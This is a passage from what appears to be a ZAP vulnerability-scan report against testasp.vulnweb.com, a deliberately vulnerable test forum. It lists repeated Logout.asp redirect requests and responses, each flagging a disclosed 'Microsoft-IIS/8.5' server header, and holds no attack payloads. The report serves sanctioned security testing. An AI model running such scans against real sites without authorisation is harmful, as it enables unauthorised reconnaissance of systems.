<a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 398 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 222 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Search.asp?tfSearch=ZAP Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 145 |
| Response Body - size: 145 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Search.asp?tfSearch=ZAP">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 388 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=0 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=0">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 388 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=1">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 388 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=2 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=2">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=0 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=0">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=1">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=10 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=10">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=11 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=11">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=12 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=12">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=13 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=13">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=14 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=14">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=15 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=15">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=16 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=16">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=17 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=17">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=18 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=18">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=19 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=19">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=2 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=2">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=20 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=20">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=21 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=21">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=22 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=22">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=23 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=23">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=24 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=24">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=25 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=25">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=26 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=26">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
